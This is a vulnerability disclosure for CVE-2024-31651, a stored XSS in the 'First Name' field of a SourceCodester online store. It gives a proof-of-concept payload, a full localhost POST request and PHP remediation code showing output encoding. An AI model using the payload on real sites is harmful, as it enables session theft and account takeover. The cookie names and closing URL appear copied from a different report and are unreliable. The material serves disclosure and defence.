CVE-2024-31651.md

File metadata and controls

80 lines (60 loc) · 4.29 KB

Stored Cross-Site Scripting Vulnerability in SourceCodester Cosmetics and Beauty Product Online Store - 1.0

Vendor: Sourcecodester
Product: Cosmetics and Beauty Product Online Store - 1.0
Product URL: Cosmetics and Beauty Product Online Store - 1.0

Executive Summary

A Stored Cross-Site Scripting (SXSS) vulnerability in Cosmetics and Beauty Product Online Store - 1.0 and earlier allows an attacker to inject malicious JavaScript code through the "First Name" input field. The injected code executes whenever the vulnerable web page is viewed by any user, staff member or admin, and it persists because the value is stored by the application. Since the malicious JavaScript can read the session cookies, this can ultimately lead to account takeover.

Issue Details

Vulnerability Name: Stored XSS in First Name
Severity: High
Affected URL: http://localhost/cbpos/classes/Master.php?f=register
Affected Parameter: First Name
HTTP Method: POST

Issue Description

The web application is vulnerable to stored Cross-Site Scripting (SXSS) in the "First Name" input field. An attacker can exploit this by placing malicious JavaScript code in the HTTP POST request that creates the user. In the example below, the attacker modifies the "First Name" parameter to insert JavaScript code that can also access the authentication cookies.

Proof Of Concept

Configure a web proxy in your browser.

Navigate to the registration URL in the browser: http://localhost/cbpos/classes/Master.php?f=register

Fill in the desired data in the input fields and intercept the request in the web proxy. Modify the First name parameter as shown below and send the request to the server.

firstname=%22%3E%3Cimg+src%3Dxx+onerror%3Dalert(1)%3E&lastname=%22%3E%3Cimg+src%3Dxx+onerror%3Dalert(1)%3E&contact=6280957713&gender=Male&default_delivery_address=ssdfsfs&email=mohit.ahir7086%40gmail.com&password=Ramasra1247%40

In the browser, create an account and navigate to the homepage, where the stored value is rendered.

https://drive.google.com/file/d/1ZoSWqudhD-uPAmaU_E04IMSdm7VBI_fu/view?usp=drive_link

Payload:

firstname=%22%3E%3Cimg+src%3Dxx+onerror%3Dalert(1)%3E&lastname=%22%3E%3Cimg+src%3Dxx+onerror%3Dalert(1)%3E&contact=6280957713&gender=Male&default_delivery_address=ssdfsfs&email=mohit.ahir7086%40gmail.com&password=Ramasra1247%40

Request:

POST /cbpos/classes/Master.php?f=register HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 227
Origin: http://localhost
DNT: 1
Sec-GPC: 1
Connection: close
Referer: http://localhost/cbpos/
Cookie: PHPSESSID=p74o2f7lqfitvojtejdnshjrau; __insuarance__logged=1; __insuarance__key=7273YL1ZQOZ448QSLS6V
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

firstname=%22%3E%3Cimg+src%3Dxx+onerror%3Dalert(1)%3E&lastname=%22%3E%3Cimg+src%3Dxx+onerror%3Dalert(1)%3E&contact=6280957713&gender=Male&default_delivery_address=ssdfsfs&email=mohit.ahir7086%40gmail.com&password=Ramasra1247%40

Impact:

Stored XSS attacks can have serious consequences, such as account takeover by stealing session cookies, theft of sensitive data, modification of the web page's content, or redirection of users to malicious sites.

Remediation:
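The following is an added example, not code from the SourceCodester application. It reflects the "First Name" value from the request above into an HTML attribute the way a profile or header template might, first unencoded (the bug) and then encoded at output time (the fix), with a server-side validation check in front of storage. The function names, the character whitelist and the 50-character limit are assumptions.

```php
<?php
// Added example (not the application's code). Demonstrates why the reported
// payload breaks out of an attribute, and how output encoding stops it.

// The firstname value from the report's request body, URL-decoded (constructed).
const REPORTED_FIRSTNAME = '"><img src=xx onerror=alert(1)>';

// Vulnerable pattern: the stored value is concatenated straight into markup.
// The leading "> terminates value="..." and the <input> tag, so the <img onerror=...>
// that follows is parsed as live markup on every page that prints the name.
function render_vulnerable(string $firstname): string
{
    return '<input type="text" name="firstname" value="' . $firstname . '">';
}

// Fixed pattern: encode at the point of output. ENT_QUOTES escapes both ' and "
// so the value can never close the attribute; < and > become &lt; and &gt;.
// The same call is used wherever the name is printed as element text.
function render_encoded(string $firstname): string
{
    $safe = htmlspecialchars($firstname, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="text" name="firstname" value="' . $safe . '">';
}

// Server-side validation before the value is stored (defence in depth, not a
// substitute for encoding): letters, spaces, apostrophes, hyphens and dots only,
// at most 50 characters. Assumed policy; requires the mbstring extension.
function firstname_is_valid(string $firstname): bool
{
    return mb_strlen($firstname, 'UTF-8') <= 50
        && preg_match('/^[\p{L}\' .\-]+$/u', $firstname) === 1;
}

// Render the reported payload both ways and run it through validation.
echo render_vulnerable(REPORTED_FIRSTNAME), PHP_EOL; // attribute broken out of
echo render_encoded(REPORTED_FIRSTNAME), PHP_EOL;    // inert, entity-encoded text
var_dump(firstname_is_valid(REPORTED_FIRSTNAME));     // rejected before storage
var_dump(firstname_is_valid('Mohit'));                // ordinary name accepted
```

Marking the PHPSESSID cookie HttpOnly limits the cookie-theft impact described above but does not remove the XSS itself; encoding on output is the actual fix.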

Implement proper input validation and output encoding to prevent malicious code from being injected into the web application. Use server-side validation to ensure that user input is checked before it is stored in the database or displayed on a web page. Apply context-appropriate output encoding so that any user-supplied value rendered on the page is treated as data rather than executable markup.

References:

https://portswigger.net/web-security/cross-site-scripting/stored

https://owasp.org/www-community/attacks/xss/

Weakness Enumeration:

CWE-79

This report highlights the stored XSS vulnerability present in the First name parameter of http://localhost/e-insurance/Script./core/new_account, including the proof of concept, its impact, remediation steps and references for further guidance on mitigation strategies.